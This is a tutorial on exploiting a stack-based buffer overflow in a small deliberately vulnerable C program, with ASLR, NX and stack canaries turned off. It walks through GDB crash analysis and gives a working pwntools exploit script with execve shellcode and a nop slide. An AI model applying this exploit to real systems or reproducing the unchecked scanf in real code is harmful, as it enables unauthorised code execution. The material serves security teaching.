Basic Stack-Based Buffer Overflow

In this article, I am going to show how to exploit a stack-based buffer overflow and the conditions that make this possible.

For the purpose of this exercise, we are going to switch off 3 security features:

Address Space Layout Randomization (ASLR)
Non-executable stack (aka stack execution prevention, aka NX Bit)
Stack canary (aka stack-protector)

How to switch off ASLR

To switch off ASLR:

    $ sudo bash -c 'echo 0 > /proc/sys/kernel/randomize_va_space'

(Note that I didn't use sudo echo 0 > /proc/sys/kernel/randomize_va_space: the > redirection is performed by the calling shell as the standard user, before sudo runs, but writing to this file requires root permission.)
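To confirm that the setting took effect, the current value can be read back. The following is a minimal sketch, assuming a Linux system; the helper name describe_aslr is mine, and the meaning given to the values 0, 1 and 2 follows the kernel's sysctl documentation:

```python
# Sketch: interpret /proc/sys/kernel/randomize_va_space (Linux only).
ASLR_PATH = "/proc/sys/kernel/randomize_va_space"

def describe_aslr(value: str) -> str:
    """Map the sysctl value to a short description (illustrative helper)."""
    meanings = {
        0: "disabled",
        1: "partial: stack, mmap base and VDSO page are randomized",
        2: "full: as 1, plus the heap (brk) is randomized",
    }
    return meanings.get(int(value.strip()), "unknown value")

if __name__ == "__main__":
    try:
        with open(ASLR_PATH) as f:
            print("ASLR is", describe_aslr(f.read()))
    except OSError:
        print("could not read", ASLR_PATH, "(not a Linux system?)")
```

After the echo 0 command above, this should report that ASLR is disabled.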

How to switch off non-executable stack and stack canary security features

To switch off the non-executable stack and the stack canary protections, we need to compile the program as follows:

    $ gcc -fno-stack-protector -z execstack -o overflow64 overflow64.c

The -z execstack option marks the stack as executable, while the -fno-stack-protector option disables the stack canary protection.
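One way to confirm that -z execstack took effect is to look at the PT_GNU_STACK program header of the compiled binary, whose flags say whether the stack may be executable. The following is a minimal sketch, assuming a little-endian ELF64 file; the function names are mine, and the demo uses a synthetic header rather than the real overflow64 so that it runs anywhere:

```python
import struct

PT_GNU_STACK = 0x6474E551  # program header type that carries the stack permissions
PF_X = 0x1                 # "execute" bit in p_flags

def stack_is_executable(elf: bytes) -> bool:
    """Return True if the PT_GNU_STACK header of an ELF64 image has the X flag."""
    if elf[:4] != b"\x7fELF" or elf[4] != 2 or elf[5] != 1:
        raise ValueError("expected a little-endian ELF64 image")
    (e_phoff,) = struct.unpack_from("<Q", elf, 32)          # program header table offset
    e_phentsize, e_phnum = struct.unpack_from("<HH", elf, 54)
    for i in range(e_phnum):
        p_type, p_flags = struct.unpack_from("<II", elf, e_phoff + i * e_phentsize)
        if p_type == PT_GNU_STACK:
            return bool(p_flags & PF_X)
    raise LookupError("no PT_GNU_STACK program header")

def fake_elf(stack_flags: int) -> bytes:
    """Build a synthetic ELF64 header with a single PT_GNU_STACK entry (demo only)."""
    header = bytearray(64)
    header[:6] = b"\x7fELF\x02\x01"                 # magic, 64-bit, little-endian
    struct.pack_into("<Q", header, 32, 64)          # e_phoff: table follows the header
    struct.pack_into("<HH", header, 54, 56, 1)      # e_phentsize, e_phnum
    phdr = struct.pack("<IIQQQQQQ", PT_GNU_STACK, stack_flags, 0, 0, 0, 0, 0, 16)
    return bytes(header) + phdr

print(stack_is_executable(fake_elf(0x7)))  # True:  RWE, as with -z execstack
print(stack_is_executable(fake_elf(0x6)))  # False: RW, no execute permission
```

On the real binary, the same function could be called on the bytes read from ./overflow64 opened in binary mode.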

Stack-based buffer overflow scheme

A variable on the stack overflows when an operation writes to it without checking its size, so that the write goes beyond the boundaries of the variable.

When an operation writes data past the limits of a stack-based buffer, it can overwrite the return address of the function in which the buffer is allocated.

This is because, as explained in The Stack, the local variables are stored at lower addresses than the return address, i.e., above it in the picture below.

How can we exploit this situation? What can we write into the stack?

The left stacks in both images represent a normal stack. The right stacks in both images represent a stack after the unsafe write operation.

The unsafe operation starts writing data from the top of the stack (where the stack variable is stored) and continues beyond its limit, overwriting the return address of the same function. This is the location where the program expects to find the address to return to when the function ends. By overwriting it we are able to divert the execution of the program.

In this image, we can also see a nop slide written on the stack before the shellcode. It is just a series of nop instructions, i.e., no-operation instructions (0x90 in machine code). We use a nop slide because it is sometimes difficult to jump to the exact start of the shellcode; with the slide, it is enough to jump approximately before it. The nop instruction is 1 byte long, so jumping to the address of any byte in the slide will not cause an error. The instruction does nothing except move on to the next one, so execution slides forward until it reaches the shellcode located at the end of the nop slide, which is then executed.
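The effect of the nop slide can be illustrated with a toy simulation. This is only a sketch: the "memory" is a Python bytes object, the placeholder bytes stand in for real shellcode, and the function name landing_offset is mine:

```python
NOP = 0x90

def landing_offset(memory: bytes, entry: int) -> int:
    """Follow nops starting at `entry`; return the offset of the first non-nop byte."""
    pc = entry
    while pc < len(memory) and memory[pc] == NOP:
        pc += 1  # a nop is one byte long and simply falls through to the next byte
    return pc

fake_shellcode = b"\xcc\xcc\xcc\xcc"          # placeholder bytes, not real shellcode
memory = bytes([NOP]) * 500 + fake_shellcode  # 500-byte slide, then the "shellcode"

# Whatever entry point inside the slide we pick, we end up at offset 500.
for entry in (0, 1, 128, 499):
    assert landing_offset(memory, entry) == 500
```

This is why the return address only has to be approximately right: any address inside the slide works.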

The program to exploit

This is the source code of the program that we are going to exploit:

    // file: overflow64.c
    #include<stdio.h>

    int main(int argc, char* argv[])
    {
        char buff[20];
        scanf("%s", buff);

        return 0;
    }

The scanf call (line 7 of the listing) is vulnerable. Why? Because the %s conversion has no field width, so scanf does not check the size of the destination array and keeps copying input past the end of buff (check man scanf).

Let’s compile this program as described previously.

The first thing we need to do is to crash the program. If we input enough characters beyond the 20 that buff can hold, the program crashes:

    $ ./overflow64
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    Segmentation fault (core dumped)

The terminal reports a segmentation fault. The next step is to understand why the program is crashing, starting with the kernel log shown by dmesg:

    $ dmesg | tail
    ......
    [13401.299114] overflow64[16566]: segfault at 616161616161 ip 0000616161616161 sp 00007fffffffddb0 error 14 in libc-2.27.so[7ffff79e4000+1e7000]

The dmesg log shows that the program named “overflow64” received a segfault (segmentation fault) when trying to access the memory location at address 616161616161. (When we ran the program, we input a lot of “a”s, which in ASCII are represented by the hexadecimal value 0x61. Is it a coincidence? Spoiler alert: no.)

This happens because the program is trying to access a memory address that it is not supposed to access.
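The link between the faulting address and our input can be checked by decoding the address bytes back to ASCII. A small sketch, using the address from the dmesg line above:

```python
fault_address = "616161616161"   # address reported by dmesg, without the 0x prefix

decoded = bytes.fromhex(fault_address)
print(decoded)          # b'aaaaaa'
print(hex(ord("a")))    # 0x61
```

Six of our "a" characters ended up in the return address, which is what the program then tried to jump to.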

By giving even more “a”s as input, we can get a different dmesg message:

    $ dmesg | tail
    ......
    [13747.451995] traps: overflow64[16766] general protection ip:555555554697 sp:7fffffffdda8 error:0 in overflow64[555555554000+1000]

In this case the message refers to a general protection fault. What is this? With the longer input, the whole return address is overwritten and becomes 0x6161616161616161, which is not a canonical address, so the ret instruction itself faults (the ip in the log still points inside overflow64). On x86_64 the highest canonical user-space address is currently 0x00007fffffffffff: even though an address is 64 bits long, current processors typically use only 48 of those bits. A 48-bit address already gives an address space of 256 terabytes, which will be enough for quite some time, so instead of wasting hardware and power resources, the hardware manufacturers chose this limit. The architecture is designed to support 64 bits, but current hardware implementations do not.
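The canonical-address rule can be written down as a short check: with 48 implemented bits, bits 47 to 63 of an address must all be equal. A minimal sketch, where the function name is_canonical and the va_bits parameter are mine:

```python
def is_canonical(addr: int, va_bits: int = 48) -> bool:
    """True if bits (va_bits-1)..63 of a 64-bit address are all 0 or all 1."""
    top = addr >> (va_bits - 1)                  # bit 47 and everything above it
    all_ones = (1 << (64 - va_bits + 1)) - 1     # 17 one-bits when va_bits is 48
    return top == 0 or top == all_ones

print(is_canonical(0x0000616161616161))  # True:  segfault when the address is accessed
print(is_canonical(0x6161616161616161))  # False: general protection fault at ret
print(is_canonical(0x00007fffffffffff))  # True:  highest canonical user-space address
```

This matches the two dmesg messages: the shorter input produced a canonical but unmapped address, the longer one a non-canonical address.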

To gather even more information on the crash we can run the program within GDB. For this purpose I use GEF, which gives easier access to debug information.

    $ gdb -q ./overflow64
    GEF for linux ready, type `gef` to start, `gef config` to configure
    73 commands loaded for GDB 8.1.0.20180409-git using Python engine 3.6
    Reading symbols from ./overflow64...(no debugging symbols found)...done.
    gef➤  r
    Starting program: /home/pippo/ctf/lectures/basic_buffer_overflow/overflow64 
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

    Program received signal SIGSEGV, Segmentation fault.
    [ Legend: Modified register | Code | Heap | Stack | String ]
    ───────────────────────────────────────────────────────────────── registers ────
    $rax   : 0x0               
    $rbx   : 0x0               
    $rcx   : 0x00007ffff7dd0560  →  0x00007ffff7dcc580  →  0x00007ffff7b9996e  →  0x636d656d5f5f0043 ("C"?)
    $rdx   : 0x00007ffff7dd18d0  →  0x0000000000000000
    $rsp   : 0x00007fffffffdcd8  →  "aaaaaaaaaaaaaaaaaa"
    $rbp   : 0x6161616161616161 ("aaaaaaaa"?)
    $rsi   : 0x1               
    $rdi   : 0x0               
    $rip   : 0x0000555555554697  →  <main+45> ret 
    $r8    : 0x0               
    $r9    : 0x0               
    $r10   : 0x0               
    $r11   : 0x0000555555554726  →   add BYTE PTR [rax], al
    $r12   : 0x0000555555554560  →  <_start+0> xor ebp, ebp
    $r13   : 0x00007fffffffddb0  →  0x0000000000000001
    $r14   : 0x0               
    $r15   : 0x0               
    $eflags: [zero carry PARITY adjust sign trap INTERRUPT direction overflow RESUME virtualx86 identification]
    $cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000 
    ───────────────────────────────────────────────────────────────────── stack ────
    0x00007fffffffdcd8│+0x0000: "aaaaaaaaaaaaaaaaaa"	 ← $rsp
    0x00007fffffffdce0│+0x0008: "aaaaaaaaaa"
    0x00007fffffffdce8│+0x0010: 0x00007fffff006161 ("aa"?)
    0x00007fffffffdcf0│+0x0018: 0x0000000100008000
    0x00007fffffffdcf8│+0x0020: 0x000055555555466a  →  <main+0> push rbp
    0x00007fffffffdd00│+0x0028: 0x0000000000000000
    0x00007fffffffdd08│+0x0030: 0x7d8cd030cadb6f2f
    0x00007fffffffdd10│+0x0038: 0x0000555555554560  →  <_start+0> xor ebp, ebp
    ─────────────────────────────────────────────────────────────── code:x86:64 ────
    0x55555555468c <main+34>        call   0x555555554540 <__isoc99_scanf@plt>
    0x555555554691 <main+39>        mov    eax, 0x0
    0x555555554696 <main+44>        leave  
    → 0x555555554697 <main+45>        ret    
    [!] Cannot disassemble from $PC
    ─────────────────────────────────────────────────────────────────── threads ────
    [#0] Id 1, Name: "overflow64", stopped, reason: SIGSEGV
    ───────────────────────────────────────────────────────────────────── trace ────
    [#0] 0x555555554697 → main()
    ────────────────────────────────────────────────────────────────────────────────
    0x0000555555554697 in main ()

In the threads section, we can see that the program stopped because it received SIGSEGV, i.e., a segmentation fault (see man 7 signal for more information on signals).

In the code section, you can see that the program stopped at the ret instruction.

In the registers section, you can see the register contents at the time of the crash.

In the stack section, you can see the stack contents.

Just after the Starting program line, we can see the input that we fed to the program.

The ret instruction takes the address pointed to by the stack pointer (rsp) and continues execution from there. The address that the program is trying to jump to is invalid: it is the value we wrote over the return address when we overflowed the buffer. Our goal is to write an address of our choosing there, so that we can divert the execution.

We need to write an address such that jumping to it will eventually execute our shellcode.

With the help of GDB we can break in the main function and have a look at the stack address of the function:

    $ gdb -q ./overflow64
    GEF for linux ready, type `gef` to start, `gef config` to configure
    73 commands loaded for GDB 8.1.0.20180409-git using Python engine 3.6
    Reading symbols from ./overflow64...(no debugging symbols found)...done.
    gef➤  b main
    Breakpoint 1 at 0x66e
    gef➤  r
    Starting program: /home/pippo/ctf/lectures/basic_buffer_overflow/overflow64 
    ......
    ──────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
    0x00007fffffffdcc0│+0x0000: 0x00005555555546a0  →  <__libc_csu_init+0> push r15	 ← $rsp, $rbp
    0x00007fffffffdcc8│+0x0008: 0x00007ffff7a05b97  →  <__libc_start_main+231> mov edi, eax
    0x00007fffffffdcd0│+0x0010: 0x0000000000000001
    0x00007fffffffdcd8│+0x0018: 0x00007fffffffdda8  →  0x00007fffffffe12f  →  "/home/pippo/ctf/lectures/basic_buffer_overflow/ove[...]"
    0x00007fffffffdce0│+0x0020: 0x0000000100008000
    0x00007fffffffdce8│+0x0028: 0x000055555555466a  →  <main+0> push rbp
    0x00007fffffffdcf0│+0x0030: 0x0000000000000000
    0x00007fffffffdcf8│+0x0038: 0x34f880d1fbfab7e5
    ────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
    0x555555554665 <frame_dummy+5>  jmp    0x5555555545d0 <register_tm_clones>
    0x55555555466a <main+0>         push   rbp
    0x55555555466b <main+1>         mov    rbp, rsp
    → 0x55555555466e <main+4>         sub    rsp, 0x30
    0x555555554672 <main+8>         mov    DWORD PTR [rbp-0x24], edi
    0x555555554675 <main+11>        mov    QWORD PTR [rbp-0x30], rsi
    0x555555554679 <main+15>        lea    rax, [rbp-0x20]
    0x55555555467d <main+19>        mov    rsi, rax
    0x555555554680 <main+22>        lea    rdi, [rip+0x9d]        # 0x555555554724
    ......
    Breakpoint 1, 0x000055555555466e in main ()

(The snippet shows only the interesting parts.)

In the first line of the stack section, we can see that the stack pointer is currently at 0x00007fffffffdcc0. The space for the local variables has not been allocated yet: the arrow in the code section shows that sub rsp, 0x30 is the next instruction to execute. When we overflow the local variables we are going to write our shellcode around this address.

In order to execute the shellcode we need to overwrite the return address of the function with our crafted address.

The location of the return address relative to the buffer that we are overflowing depends on many things: the size of the other local variables (and their positions compared to the overflowed one), the stack alignment, and the presence of the stack canary.

A simple way to find the correct location is to feed the program increasingly long inputs until we can see that we overwrite the return address of the function.
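For this particular build, the offset found by trial can be cross-checked against the disassembly shown earlier: lea rax, [rbp-0x20] is the buffer address passed to scanf, so the buffer starts 0x20 bytes below rbp. The sketch below assumes the usual frame layout set up by push rbp; mov rbp, rsp (saved rbp at [rbp], return address at [rbp+8]); the constant names are mine:

```python
BUFFER_BELOW_RBP = 0x20   # from "lea rax, [rbp-0x20]" in the disassembly
SAVED_RBP_SIZE = 8        # "push rbp" stores 8 bytes on x86-64

# Bytes to write before reaching the saved return address.
offset_to_return_address = BUFFER_BELOW_RBP + SAVED_RBP_SIZE
print(offset_to_return_address)   # 40
```

A different compiler version or different flags may lay out the frame differently, so the value should always be confirmed in the debugger.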

Once we find the offset of the return address, we need to point it to the shellcode. We have already found an address near where the shellcode will be located. What needs to be placed on the stack before the shellcode is a nop slide that helps us reach it, as shown previously.

This is achieved with the following code (I am using Pwntools):

    # filename: exploit_overflow64.py
    from pwn import *

    # path of the program to exploit
    process_path = "./overflow64"

    # x86-64 execve("/bin/sh") shellcode, kept as bytes so it also works on Python 3
    shellcode  = b"\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x2f"
    shellcode += b"\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57"
    shellcode += b"\x54\x5f\x6a\x3b\x58\x0f\x05"

    # return address inside the nop slide: stack address seen in GDB (0x00007fffffffdcc0) + 0x90
    # maximum canonical address size is 0x00007FFFFFFFFFFF
    ret_addr = b"\x00\x00\x7f\xff\xff\xff\xdd\x50"[::-1]  # reversed for little-endian

    payload  = b"A" * 40 + ret_addr        # padding up to the return address
    payload += b"\x90" * 500 + shellcode   # nop slide followed by the shellcode

    # write the payload to a file so it can be used elsewhere (e.g., GDB)
    with open("payload", "wb") as f:
        f.write(payload)

    # start the program
    proc = process(process_path)

    # send payload
    proc.sendline(payload)

    # we need to interact with the spawned shell
    proc.interactive()
    proc.close()

In line 16, where the payload is built, we can see that I am preparing the input for the scanf function: 40 “A”s, then the return address, then 500 nop operations and finally the shellcode.
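It is worth checking that the chosen return address really falls inside the nop slide. The sketch below uses the stack addresses from the GDB session above (the return address of main is stored at 0x00007fffffffdcc8); the constant names are mine, and the addresses are only valid for that session, since the stack can sit at a slightly different place outside GDB:

```python
RET_SLOT = 0x00007fffffffdcc8   # where main's return address is stored (GDB session)
RET_ADDR = 0x00007fffffffdd50   # value the payload writes into that slot
NOP_COUNT = 500

slide_start = RET_SLOT + 8            # the nops are written right after the return address
slide_end = slide_start + NOP_COUNT   # address of the first shellcode byte

assert slide_start <= RET_ADDR < slide_end
print(hex(RET_ADDR - slide_start))    # 0x80:  how far into the slide we land
print(hex(slide_end - RET_ADDR))      # 0x174: nops executed before the shellcode
```

The margin on both sides is what makes the exploit tolerate small shifts in the stack position.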

Now we can give this input to the program: it will overflow the variable and write the chosen return address. If we run it in GDB and break just after the scanf call, our stack will look like this:

    gef➤  dereference $rsp 20
        0x00007fffffffdc90│+0x0000: 0x00007fffffffdda8  →  0x9090909090909090	 ← $rsp
        0x00007fffffffdc98│+0x0008: 0x0000000100000000
        0x00007fffffffdca0│+0x0010: 0x4141414141414141
        0x00007fffffffdca8│+0x0018: 0x4141414141414141
        0x00007fffffffdcb0│+0x0020: 0x4141414141414141
        0x00007fffffffdcb8│+0x0028: 0x4141414141414141
        0x00007fffffffdcc0│+0x0030: 0x4141414141414141	 ← $rbp
        0x00007fffffffdcc8│+0x0038: 0x00007fffffffdd50  →  0x9090909090909090
        0x00007fffffffdcd0│+0x0040: 0x9090909090909090
        0x00007fffffffdcd8│+0x0048: 0x9090909090909090
        0x00007fffffffdce0│+0x0050: 0x9090909090909090

The entry just below rbp holds the return address that we overwrote when we overflowed the variable, and it now points to a location where nops are stored. The shellcode sits at the end of the nops, so when main returns, the program slides through them and eventually executes the shellcode, which was our initial goal.